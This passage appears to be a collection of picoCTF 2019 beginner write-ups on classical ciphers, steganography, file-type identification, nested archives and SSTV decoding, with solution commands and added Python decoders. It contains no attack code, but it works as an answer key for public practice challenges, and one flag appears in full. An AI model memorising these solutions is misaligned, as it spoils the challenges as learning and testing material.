Hints:
1. This can be solved online if you don't want to do it by hand!
```
Challenge link: [https://play.picoctf.org/practice/challenge/62](https://play.picoctf.org/practice/challenge/62)

## Solution

There are several ways to solve this challenge and here are some of them.

### CyberChef solution

We can use [CyberChef](https://gchq.github.io/CyberChef/) and the `ROT13` recipe to solve this.
Type 'rot13' in the `Operations` search bar, then drag and drop it to the `Recipe` pane.
Then copy and paste `cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}` into the `Input` pane.
Finally press `BAKE` if you don't have `Auto Bake` selected already.
The flag is shown in the `Output` pane.

### Use a rot13 command-line tool in Linux

There are at least two packages that contain prepackaged `rot13` tools:
* [hxtools](https://manpages.debian.org/testing/hxtools/hxtools.7.en.html)
* [bsdgames](https://wiki.linuxquestions.org/wiki/BSD_games)

Install them with either `sudo apt install hxtools` or `sudo apt install bsdgames`.

The tool from `hxtools` installs as `/usr/bin/rot13` and is a script that invokes the `tr` command more or less as described below.

The tool from `bsdgames` installs as `/usr/games/rot13` and calls the `caesar` tool (which is also included in the package) with a rotation of 13.

After one of these tools has been installed you can run
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/13]
└─$ echo 'cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}' | rot13
picoCTF{}
```

### Use the tr tool in Linux

Alternatively, you can use the `tr` tool like this. The two character ranges map each letter to the one 13 positions later, wrapping around at the end of the alphabet, so the same command also reverses the encoding.
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/13]
└─$ echo 'cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
picoCTF{}
```

For additional information, please see the references below.

## References

- [tr - Linux manual page](https://man7.org/linux/man-pages/man1/tr.1.html)
- [Wikipedia - Modulo](https://en.wikipedia.org/wiki/Modulo)
- [Wikipedia - ROT13](https://en.wikipedia.org/wiki/ROT13)

---

`/picoCTF_2019/Cryptography/Easy1.md`:

# Easy1

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2019, Cryptography
Author: ALEX FULTON/DANNY

Description:
The one time pad can be cryptographically secure, but not when you know the key.
Can you solve this?

We've given you the encrypted flag, key, and a table to help UFJKXQZQUNB with the key of SOLVECRYPTO.
Can you use this table to solve it?.

Hints:
1. Submit your answer in our flag format. For example, if your answer was 'hello',
you would submit 'picoCTF{HELLO}' as the flag.
2. Please use all caps for the message.
```
Challenge link: [https://play.picoctf.org/practice/challenge/43](https://play.picoctf.org/practice/challenge/43)

## Solution

There are several ways to solve this challenge and here are two of them.

### Use an online decoder service

You can use an online decoder service such as [Braingle](https://www.braingle.com/brainteasers/codes/onetimepad.php) or [Rumkin](https://rumkin.com/tools/cipher/one-time-pad/) to solve this challenge.

In Braingle, use `UFJKXQZQUNB` as `PLAINTEXT / CIPHERTEXT` and `SOLVECRYPTO` as `ONE-TIME PAD`. Click `Decipher` to get the flag.

In Rumkin, set `Operating mode` to `Decrypt`, set `SOLVECRYPTO` as `The pad` and `UFJKXQZQUNB` as `Text to encode or decode`.
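Both the ROT13 section of the `13` writeup above and the one-time pad here are letter arithmetic modulo 26: ROT13 adds a fixed 13 to every letter, while the one-time pad adds a different pad letter at each position. The added example below (mine, not part of either writeup) generalises ROT13 to an arbitrary shift `rot(text, n)`, cross-checks it against the `tr 'A-Za-z' 'N-ZA-Mn-za-m'` mapping written as a Python translation table, and implements pad encryption and decryption with the same subtraction formula the writeup's `decode()` uses. The sample strings are constructed, not the challenge values.

```python
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase


def rot(text: str, n: int) -> str:
    """Shift A-Z and a-z by n positions modulo 26; other characters pass through.

    rot(text, 13) is the same mapping as `tr 'A-Za-z' 'N-ZA-Mn-za-m'`, and
    because 13 + 13 = 26 it is its own inverse.
    """
    out = []
    for ch in text:
        if ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + n) % 26])
        elif ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + n) % 26])
        else:
            out.append(ch)           # digits, braces, underscores: unchanged
    return "".join(out)


def rot13(text: str) -> str:
    return rot(text, 13)


# The tr command's two ranges written as a translation table, as a cross-check
_TR_TABLE = str.maketrans(UPPER + LOWER,
                          UPPER[13:] + UPPER[:13] + LOWER[13:] + LOWER[:13])


def rot13_tr(text: str) -> str:
    return text.translate(_TR_TABLE)


def _check_alpha(s: str, what: str) -> None:
    # The challenge asks for all caps; anything else has no column in the table
    if not s or any(ch not in UPPER for ch in s):
        raise ValueError(f"{what} must be non-empty and upper-case A-Z only")


def otp_encrypt(plaintext: str, pad: str) -> str:
    """Letter one-time pad: c_i = (p_i + k_i) mod 26 over A-Z."""
    _check_alpha(plaintext, "plaintext")
    _check_alpha(pad, "pad")
    if len(pad) < len(plaintext):
        raise ValueError("pad must be at least as long as the plaintext")
    return "".join(UPPER[(UPPER.index(p) + UPPER.index(k)) % 26]
                   for p, k in zip(plaintext, pad))


def otp_decrypt(ciphertext: str, pad: str) -> str:
    """Inverse: p_i = (c_i - k_i) mod 26, the arithmetic of the writeup's decode()."""
    _check_alpha(ciphertext, "ciphertext")
    _check_alpha(pad, "pad")
    if len(pad) < len(ciphertext):
        raise ValueError("pad must be at least as long as the ciphertext")
    return "".join(UPPER[(UPPER.index(c) - UPPER.index(k)) % 26]
                   for c, k in zip(ciphertext, pad))


if __name__ == "__main__":
    # Constructed samples (not the challenge strings)
    print(rot13("Hello, World!"))                         # Uryyb, Jbeyq!
    print(otp_encrypt("HELLO", "XMCKL"))                  # EQNVZ
    print(otp_decrypt(otp_encrypt("HELLO", "XMCKL"), "XMCKL"))  # HELLO
```

The length check in the pad functions is the property that separates a one-time pad from a repeating-key cipher: the pad must cover every letter and, as the challenge description notes, the scheme is only as secret as the pad itself.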

### Write a Python decoder

Alternatively, you can write a Python script to do the decoding
```python
#!/usr/bin/env python3

# One-time pad on letters: subtract the key letter from the ciphertext
# letter modulo 26, with 'A' = 0 ... 'Z' = 25
def decode(cipher_char, key_char):
    return chr((ord(cipher_char) - ord(key_char)) % 26 + ord('A'))

ciphertext = 'UFJKXQZQUNB'
key = 'SOLVECRYPTO'

result = ''
for c, k in zip(ciphertext, key):
    result += decode(c, k)
print(f"picoCTF{{{result}}}")
```

Then we make sure the script is executable and run it to get the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/Easy1]
└─$ chmod +x decode.py

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/Easy1]
└─$ ./decode.py
picoCTF{}
```

For additional information, please see the references below.

## References

- [Wikipedia - Modulo](https://en.wikipedia.org/wiki/Modulo)
- [Wikipedia - One-time pad](https://en.wikipedia.org/wiki/One-time_pad)

--------------------------------------------------------------------------------
/picoCTF_2019/Cryptography/Flags.md:
--------------------------------------------------------------------------------
# Flags

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 200
Tags: picoCTF 2019, Cryptography
Author: DANNY

Description:
What do the flags mean?

Hints:
1. The flag is in the format PICOCTF{}
```
Challenge link: [https://play.picoctf.org/practice/challenge/31](https://play.picoctf.org/practice/challenge/31)

## Solution

After some searching I found the [International Signal Flag and Pennant Alphabet](https://christinedemerchant.com/flag-alphabet.html) where each flag corresponds to a character in the alphabet.

Then it's just a bit of a manual process to construct the flag.

For additional information, please see the references below.

## References

- [Wikipedia - International maritime signal flags](https://en.wikipedia.org/wiki/International_maritime_signal_flags)

--------------------------------------------------------------------------------
/picoCTF_2019/Cryptography/Mr-Worldwide.md:
--------------------------------------------------------------------------------
# Mr-Worldwide

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 200
Tags: picoCTF 2019, Cryptography
Author: DANNY

Description:
A musician left us a message. What's it mean?

Hints:
(None)
```
Challenge link: [https://play.picoctf.org/practice/challenge/40](https://play.picoctf.org/practice/challenge/40)

## Solution

Let's start by checking the contents of the message
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/Mr_Worldwide]
└─$ cat message.txt
picoCTF{(35.028309, 135.753082)(46.469391, 30.740883)(39.758949, -84.191605)(41.015137, 28.979530)(24.466667, 54.366669)(3.140853, 101.693207)_(9.005401, 38.763611)(-3.989038, -79.203560)(52.377956, 4.897070)(41.085651, -73.858467)(57.790001, -152.407227)(31.205753, 29.924526)}
```

Ah, this could be [longitude](https://en.wikipedia.org/wiki/Longitude) and [latitude](https://en.wikipedia.org/wiki/Latitude) coordinates for places around the world.

Let's use [Google Maps](https://www.google.com/maps/) to find out what place each coordinate corresponds to.
|Coordinate|City|
|----|----|
|(35.028309, 135.753082)|Kyoto|
|(46.469391, 30.740883)|Odesa|
|(39.758949, -84.191605)|Dayton|
|(41.015137, 28.979530)|Istanbul|
|(24.466667, 54.366669)|Abu Dhabi|
|(3.140853, 101.693207)|Kuala Lumpur|
|etc.|etc.|

For each city, take the first letter and you have the flag (which should be in CAPITALS).

For additional information, please see the references below.

## References

- [Wikipedia - Latitude](https://en.wikipedia.org/wiki/Latitude)
- [Wikipedia - Longitude](https://en.wikipedia.org/wiki/Longitude)

--------------------------------------------------------------------------------
/picoCTF_2019/Cryptography/README.md:
--------------------------------------------------------------------------------
# Cryptography Challenges

11 Challenges:
- [13](13.md)
- [caesar](caesar.md)
- [Easy1](Easy1.md)
- [Flags](Flags.md)
- [la cifra de](la_cifra_de.md)
- [miniRSA](miniRSA.md)
- [Mr-Worldwide](Mr-Worldwide.md)
- [rsa-pop-quiz](rsa-pop-quiz.md)
- [Tapping](Tapping.md)
- [The Numbers](The_Numbers.md)
- [waves over lambda](waves_over_lambda.md)

--------------------------------------------------------------------------------
/picoCTF_2019/Cryptography/Tapping.md:
--------------------------------------------------------------------------------
# Tapping

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 200
Tags: picoCTF 2019, Cryptography
Author: DANNY

Description:
Theres tapping coming in from the wires. What's it saying

nc jupiter.challenges.picoctf.org 21610.

Hints:
1. What kind of encoding uses dashes and dots?
2. The flag is in the format PICOCTF{}
```
Challenge link: [https://play.picoctf.org/practice/challenge/21](https://play.picoctf.org/practice/challenge/21)

## Solution

Tapping, dashes and dots - that ought to mean [morse code](https://en.wikipedia.org/wiki/Morse_code).

Let's connect to the server and find out
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/Tapping]
└─$ nc jupiter.challenges.picoctf.org 21610
.--. .. -.-. --- -.-. - ..-. { -- ----- .-. ... ...-- -.-. ----- -.. ...-- .---- ... ..-. ..- -. ...-- ----. ----- ..--- ----- .---- ----. ..... .---- ----. }
```

Yes, that looks like morse code (apart from the curly braces).

To decode it we can use an online service such as the one from [onlineconversion](https://www.onlineconversion.com/morse_code.htm).

Copy and paste the output above into the lower part of the website under `Convert morse code back into English`.
Then press `Translate!` and the flag will be shown.

For additional information, please see the references below.

## References

- [Wikipedia - Morse code](https://en.wikipedia.org/wiki/Morse_code)

--------------------------------------------------------------------------------
/picoCTF_2019/Cryptography/The_Numbers.md:
--------------------------------------------------------------------------------
# The Numbers

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 50
Tags: picoCTF 2019, Cryptography
Author: PANDU

Description:
The numbers... what do they mean?

Hints:
1. The flag is in the format PICOCTF{}
```
Challenge link: [https://play.picoctf.org/practice/challenge/68](https://play.picoctf.org/practice/challenge/68)

## Solution

There are several ways to solve this challenge and here are some of them.

### CyberChef solution

We can use [CyberChef](https://gchq.github.io/CyberChef/) and the `Magic` recipe to solve this.

Write the numbers before the '{' character (that is `16 9 3 15 3 20 6`) with spaces in between in the `Input` pane of CyberChef. Don't end with a space!

Click the 'Magic Wand' icon at the `Output` pane.
If you don't get an icon, you need to type 'magic' in the `Operations` search bar, then drag and drop it to the `Recipe` and press `BAKE`.

CyberChef recognizes the encoding as `A1Z26`.
Unfortunately, CyberChef can't handle the '{' and '}' characters so you need to leave them out.

Then add the rest of the numbers in the `Input` pane (`20 8 5 14 21 13 2 5 18 19 13 1 19 15 14`).

Finally, add the `To Upper case` recipe as instructed in the hint.

You need to manually add the '{' and '}' characters before submitting the flag.

### Use an online A1Z26 decoder service

You can also use an online A1Z26 decoder service such as [Boxentriq](https://www.boxentriq.com/code-breaking/a1z26).

Add the numbers in the `Numbers` text field and you get the result in the `Letters` text field.

Again, you need to add the '{' and '}' characters before submitting the flag.
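One table-driven decoder that serves both this challenge and the Morse message from Tapping above, as an added example (not code from either writeup): both ciphers are whitespace-separated tokens looked up in a table, and both online services stumble on the `{` and `}` characters. `decode_tokens` passes those through and raises on any other unknown token, so a garbled symbol is noticed rather than silently dropped. The `MORSE` table and the helper names are mine; the two message constants are the outputs quoted in the respective writeups.

```python
import string

# International Morse code for letters and digits
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# A1Z26: "1" -> A, "2" -> B, ..., "26" -> Z
A1Z26 = {str(i): ch for i, ch in enumerate(string.ascii_uppercase, start=1)}

# Flag-format characters that belong to neither code
PASSTHROUGH = {"{", "}", "_"}


def decode_tokens(message: str, table: dict[str, str]) -> str:
    """Translate each whitespace-separated token through `table`.

    Tokens in PASSTHROUGH are copied unchanged; any other unknown token is an
    error, which is the behaviour a decoder should have so that a corrupted
    symbol does not vanish from the result without notice.
    """
    out = []
    for token in message.split():
        if token in table:
            out.append(table[token])
        elif token in PASSTHROUGH:
            out.append(token)
        else:
            raise ValueError(f"unknown token {token!r}")
    return "".join(out)


def encode_morse(text: str) -> str:
    """Inverse of decoding with MORSE, for round-trip checks."""
    reverse = {v: k for k, v in MORSE.items()}
    return " ".join(reverse.get(ch, ch) for ch in text.upper())


# The server output quoted in the Tapping writeup
MORSE_MESSAGE = (
    ".--. .. -.-. --- -.-. - ..-. { -- ----- .-. ... ...-- -.-. ----- -.. "
    "...-- .---- ... ..-. ..- -. ...-- ----. ----- ..--- ----- .---- ----. "
    "..... .---- ----. }"
)

# The numbers quoted in The Numbers writeup
A1Z26_MESSAGE = "16 9 3 15 3 20 6 { 20 8 5 14 21 13 2 5 18 19 13 1 19 15 14 }"

if __name__ == "__main__":
    print(decode_tokens(MORSE_MESSAGE, MORSE))
    print(decode_tokens(A1Z26_MESSAGE, A1Z26))
```

Swapping the table is all it takes to move from one code to the other; the tokenising and the brace handling are shared.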

### Write a Python decoder

Alternatively, you can write a Python script to do the decoding
```python
#!/usr/bin/env python3

import string

# A1Z26: A = 1, B = 2, ..., Z = 26
ALPHABET = string.ascii_uppercase

enc_flag = "16 9 3 15 3 20 6 { 20 8 5 14 21 13 2 5 18 19 13 1 19 15 14 }".split()

flag = ''
for num in enc_flag:
    if num.isnumeric():
        flag += ALPHABET[int(num)-1]
    else:
        # Pass the '{' and '}' characters through unchanged
        flag += num
print(flag)
```

Then we make sure the script is executable and run it to get the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/The_Numbers]
└─$ chmod +x decode.py

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/The_Numbers]
└─$ ./decode.py
PICOCTF{}
```

For additional information, please see the references below.

## References

- [A1Z26 Cipher (What it is and How to Teach Your Kids)](https://dadstuffsite.com/a1z26-cipher-what-it-is-and-how-to-teach-your-kids/)

--------------------------------------------------------------------------------
/picoCTF_2019/Forensics/README.md:
--------------------------------------------------------------------------------
# Forensics Challenges

12 Challenges:
- [extensions](extensions.md)
- [Glory of the Garden](Glory_of_the_Garden.md)
- [Investigative Reversing 0](Investigative_Reversing_0.md)
- [Investigative Reversing 1](Investigative_Reversing_1.md)
- [like1000](like1000.md)
- [m00nwalk](m00nwalk.md)
- [m00nwalk2](m00nwalk2.md)
- [shark on wire 1](shark_on_wire_1.md)
- [shark on wire 2](shark_on_wire_2.md)
- [So Meta](So_Meta.md)
- [What Lies Within](What_Lies_Within.md)
- [WhitePages](WhitePages.md)

--------------------------------------------------------------------------------
/picoCTF_2019/Forensics/What_Lies_Within.md:
--------------------------------------------------------------------------------
# What Lies Within

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 150
Tags: picoCTF 2019, Forensics
Author: JULIO/DANNY

Description:
There's something in the building. Can you retrieve the flag?

Hints:
1. There is data encoded somewhere... there might be an online decoder.
```
Challenge link: [https://play.picoctf.org/practice/challenge/74](https://play.picoctf.org/practice/challenge/74)

## Solution

There are several ways to solve this challenge and here are two of them.

### Using an online service

We can use the [stylesuxx steganography online](http://stylesuxx.github.io/steganography/#decode) service to solve this.

Click `Choose File` and select the file. Then press the `Decode` button to get the flag.

### Using zsteg

We can also use [zsteg](https://github.com/zed-0xff/zsteg) to solve this
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/What_Lies_Within]
└─$ zsteg buildings.png
b1,r,lsb,xy       .. text: "^5>R5YZrG"
b1,rgb,lsb,xy     .. text: "picoCTF{}" <----- Here
b1,abgr,msb,xy    .. file: PGP Secret Sub-key -
b2,b,lsb,xy       .. text: "XuH}p#8Iy="
b3,abgr,msb,xy    .. text: "t@Wp-_tH_v\r"
b4,r,lsb,xy       .. text: "fdD\"\"\"\" "
b4,r,msb,xy       .. text: "%Q#gpSv0c05"
b4,g,lsb,xy       .. text: "fDfffDD\"\""
b4,g,msb,xy       .. text: "f\"fff\"\"DD"
b4,b,lsb,xy       .. text: "\"$BDDDDf"
b4,b,msb,xy       .. text: "wwBDDDfUU53w"
b4,rgb,msb,xy     .. text: "dUcv%F#A`"
b4,bgr,msb,xy     .. text: " V\"c7Ga4"
b4,abgr,msb,xy    .. text: "gOC_$_@o"
```

For additional information, please see the references below.
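What zsteg's `b1,rgb,lsb,xy` line means, as an added example that is not part of the writeup and does not read a real PNG: the image is a constructed list of RGB tuples in `xy` order (x fastest, then y), `embed_lsb` hides a constructed message in the least-significant bit of each channel (only to build the sample; it is the half of the process zsteg does not do), and `extract_lsb` recovers it by reading one bit per selected channel in pixel order. Reading a different channel set, like zsteg's `b1,r,lsb,xy`, yields garbage from the same pixels, which is why the tool enumerates channel orders. The most-significant-bit-first packing and the NUL terminator are assumptions of this example.

```python
# Constructed stand-in for an RGB image: deterministic so the example runs offline
WIDTH, HEIGHT = 32, 16


def sample_image() -> list[tuple[int, int, int]]:
    """Pixels in "xy" order: x varies fastest, then y."""
    return [((x * 7) % 256, (y * 13 + 5) % 256, (x * y) % 256)
            for y in range(HEIGHT) for x in range(WIDTH)]


def _bits(data: bytes):
    """Most-significant bit first within each byte (assumed packing order)."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed_lsb(pixels, message: bytes, channels=(0, 1, 2)):
    """Overwrite the LSB of the selected channels, pixel by pixel, with the
    message bits followed by a NUL terminator. Returns a new pixel list."""
    payload = list(_bits(message + b"\x00"))
    if len(payload) > len(pixels) * len(channels):
        raise ValueError("message does not fit in the image")
    out = [list(px) for px in pixels]
    i = 0
    for px in out:
        for ch in channels:
            if i == len(payload):
                return [tuple(p) for p in out]
            px[ch] = (px[ch] & ~1) | payload[i]  # clear bit 0, then set it
            i += 1
    return [tuple(p) for p in out]


def extract_lsb(pixels, channels=(0, 1, 2)) -> bytes:
    """Read the LSB of the selected channels in pixel order, pack eight bits
    per byte and stop at the first NUL.

    channels=(0, 1, 2) is zsteg's b1,rgb,lsb,xy; (0,) is b1,r,lsb,xy;
    (2, 1, 0) is b1,bgr,lsb,xy.
    """
    bits = (px[ch] & 1 for px in pixels for ch in channels)
    out = bytearray()
    while True:
        byte = 0
        try:
            for _ in range(8):
                byte = (byte << 1) | next(bits)
        except StopIteration:
            break  # fewer than 8 bits left: no complete byte
        if byte == 0:
            break
        out.append(byte)
    return bytes(out)


if __name__ == "__main__":
    stego = embed_lsb(sample_image(), b"picoCTF{constructed_example}")
    print(extract_lsb(stego))               # the hidden message
    print(extract_lsb(stego, channels=(0,)))  # red channel only: noise
```

Because only bit 0 of each channel changes, no channel value moves by more than 1, which is why the carrier looks unchanged to the eye and why detection has to look at bit-plane statistics rather than at the picture.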

## References

- [Wikipedia - Steganography](https://en.wikipedia.org/wiki/Steganography)
- [zsteg](https://github.com/zed-0xff/zsteg)

--------------------------------------------------------------------------------
/picoCTF_2019/Forensics/extensions.md:
--------------------------------------------------------------------------------
# extensions

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 150
Tags: picoCTF 2019, Forensics
Author: SANJAY C/DANNY

Description:
This is a really weird text file TXT? Can you find the flag?

Hints:
1. How do operating systems know what kind of file it is? (It's not just the ending!
2. Make sure to submit the flag as picoCTF{XXXXX}
```
Challenge link: [https://play.picoctf.org/practice/challenge/52](https://play.picoctf.org/practice/challenge/52)

## Solution

Let's start by checking the file with `file`.
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Extensions]
└─$ file flag.txt
flag.txt: PNG image data, 1697 x 608, 8-bit/color RGB, non-interlaced
```

Ah, it's a PNG picture file, not a text file.

To view the flag use a tool such as `eog` or `feh`.

For additional information, please see the references below.
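What `file` is doing here, as an added example (not part of the writeup): identify the type from the leading bytes rather than from the name, read the width and height out of the PNG `IHDR` chunk the way `file` prints `1697 x 608`, and flag the disagreement between a `.txt` name and PNG content, which is the same check an upload handler or a triage script should make before trusting an extension. The signature list is a small selection, the sample PNG header is constructed (signature and `IHDR` only, no image data or CRC), and the function names are mine.

```python
import os
import struct

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# A small selection of well-known magic numbers: (signature, description)
MAGIC = [
    (PNG_SIGNATURE, "PNG image data"),
    (b"\xff\xd8\xff", "JPEG image data"),
    (b"GIF87a", "GIF image data"),
    (b"GIF89a", "GIF image data"),
    (b"%PDF-", "PDF document"),
    (b"PK\x03\x04", "Zip archive data"),
    (b"\x7fELF", "ELF"),
    (b"\x1f\x8b", "gzip compressed data"),
]

# What each file name extension claims the content is
EXTENSION_CLAIMS = {
    ".png": "PNG image data", ".jpg": "JPEG image data", ".jpeg": "JPEG image data",
    ".gif": "GIF image data", ".pdf": "PDF document", ".zip": "Zip archive data",
    ".gz": "gzip compressed data", ".txt": "ASCII text",
}


def identify(data: bytes) -> str:
    """Type by content: first matching signature, else a text heuristic, else 'data'."""
    for signature, description in MAGIC:
        if data.startswith(signature):
            return description
    if data and all(32 <= b < 127 or b in b"\t\n\r" for b in data):
        return "ASCII text"
    return "data"


def png_dimensions(data: bytes):
    """(width, height) from the IHDR chunk that must follow the signature,
    or None when the data is not a PNG. Both are big-endian 32-bit values."""
    if not data.startswith(PNG_SIGNATURE) or data[12:16] != b"IHDR":
        return None
    return struct.unpack(">II", data[16:24])


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the name claims one type and the content is another."""
    claimed = EXTENSION_CLAIMS.get(os.path.splitext(filename)[1].lower())
    if claimed is None:
        return False  # unknown extension: nothing to compare against
    return claimed != identify(data)


def sample_png_header(width: int, height: int) -> bytes:
    """Constructed PNG prefix: signature + IHDR for an 8-bit RGB image."""
    ihdr = struct.pack(">II", width, height) + b"\x08\x02\x00\x00\x00"
    return PNG_SIGNATURE + struct.pack(">I", len(ihdr)) + b"IHDR" + ihdr


if __name__ == "__main__":
    data = sample_png_header(1697, 608)
    print(identify(data), png_dimensions(data), extension_mismatch("flag.txt", data))
```

The text heuristic is deliberately strict (printable ASCII plus tab, CR and LF); `file` has many more signatures and encodings, but the order of the checks is the same: content first, name never.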

## References

- [file - Linux manual page](https://man7.org/linux/man-pages/man1/file.1.html)
- [Wikipedia - Filename extension](https://en.wikipedia.org/wiki/Filename_extension)

--------------------------------------------------------------------------------
/picoCTF_2019/Forensics/like1000.md:
--------------------------------------------------------------------------------
# like1000

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 250
Tags: picoCTF 2019, Forensics
Author: DANNY

Description:
This .tar file got tarred a lot.

Hints:
1. Try and script this, it'll save you a lot of time
```
Challenge link: [https://play.picoctf.org/practice/challenge/81](https://play.picoctf.org/practice/challenge/81)

## Solution

Let's start by untarring the file
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Like1000]
└─$ tar xfv 1000.tar
999.tar
filler.txt
```

Hmm, there will probably be 1000 files, but let's verify the next step as well
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Like1000]
└─$ tar xfv 999.tar
998.tar
filler.txt
```

Yes, let's script this as suggested in the hint
```bash
#!/bin/bash

# Unpack 1000.tar, then 999.tar, ... down to 1.tar, removing the filler
# file and the archive just extracted at each step
for i in $(seq 1000 -1 1)
do
    tar xvf "$i.tar"
    rm filler.txt
    rm "$i.tar"
done
```

Then we make sure the script is executable and run it
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Like1000]
└─$ chmod +x unpack.sh

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Like1000]
└─$ ./unpack.sh
999.tar
filler.txt
998.tar
filler.txt
997.tar
filler.txt
996.tar
filler.txt
995.tar
filler.txt
<---snip--->
3.tar
filler.txt
2.tar
filler.txt
1.tar
filler.txt
flag.png
filler.txt
```

The unpacking will take a few minutes.

To view the flag use a tool such as `eog` or `feh`.

For additional information, please see the references below.

## References

- [tar - Linux manual page](https://man7.org/linux/man-pages/man1/tar.1.html)
- [Bash seq and range](https://linuxhint.com/bash_range/)

--------------------------------------------------------------------------------
/picoCTF_2019/Forensics/m00nwalk.md:
--------------------------------------------------------------------------------
# m00nwalk

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 250
Tags: picoCTF 2019, Forensics
Author: JOON

Description:
Decode this message from the moon.

Hints:
1. How did pictures from the moon landing get sent back to Earth?
2. What is the CMU mascot?, that might help select a RX option
```
Challenge link: [https://play.picoctf.org/practice/challenge/26](https://play.picoctf.org/practice/challenge/26)

## Solution

After some googling I understood that this is [SSTV (Slow-scan television)](https://en.wikipedia.org/wiki/Slow-scan_television) and there is an [SSTV Decoder](https://github.com/colaclanth/sstv) available.

After installing the decoder we run it like this
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/M00nwalk]
└─$ sstv -d message.wav -o moonwalk_result.png
[sstv] Searching for calibration header... Found!
[sstv] Detected SSTV mode Scottie 1
[sstv] Decoding image... [####################################################################################################] 100%
[sstv] Drawing image data...
[sstv] ...Done!
```

The program automatically detects the SSTV mode as `Scottie 1` for us.

Then we just view the resulting image
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/M00nwalk]
└─$ eog moonwalk_result.png &
```

Rotate the picture twice and then you can see the flag more easily.

For additional information, please see the references below.

## References

- [Wikipedia - Slow-scan television](https://en.wikipedia.org/wiki/Slow-scan_television)
- [SSTV Decoder](https://github.com/colaclanth/sstv)

--------------------------------------------------------------------------------
/picoCTF_2019/General_Skills/2Warm.md:
--------------------------------------------------------------------------------
# 2Warm

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 50
Tags: picoCTF 2019, General Skills
Author: SANJAY C/DANNY TUNITIS

Description:
Can you convert the number 42 (base 10) to binary (base 2)?

Hints:
1. Submit your answer in our competition's flag format. For example, if your answer was '11111',
you would submit 'picoCTF{11111}' as the flag.
```
Challenge link: [https://play.picoctf.org/practice/challenge/86](https://play.picoctf.org/practice/challenge/86)

## Solution

### Convert in Python

We can use an interactive Python session to do the work for us with the [bin function](https://docs.python.org/3/library/functions.html#bin)
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/2Warm]
└─$ python
Python 3.11.4 (main, Jun 7 2023, 10:13:09) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print('picoCTF{' + bin(42)[2:] + '}')
picoCTF{101010}
>>> exit()
```

### Convert with bc

Alternatively, we can use the tool `bc` to do the conversion. Install it with `sudo apt install bc` if it isn't installed already.
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/2Warm]
└─$ echo "obase=2; 42" | bc
101010
```
In this case you need to construct the complete flag manually.

For additional information, please see the references below.

## References

- [Wikipedia - Binary number](https://en.wikipedia.org/wiki/Binary_number)
- [Python - Slicing Strings](https://www.w3schools.com/python/python_strings_slicing.asp)

--------------------------------------------------------------------------------
/picoCTF_2019/General_Skills/Bases.md:
--------------------------------------------------------------------------------
# Bases

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2019, General Skills
Author: SANJAY C/DANNY T

Description:
What does this bDNhcm5fdGgzX3IwcDM1 mean?

I think it has something to do with bases.

Hints:
1. Submit your answer in our flag format. For example, if your answer was 'hello',
you would submit 'picoCTF{hello}' as the flag.
```
Challenge link: [https://play.picoctf.org/practice/challenge/67](https://play.picoctf.org/practice/challenge/67)

## Solution

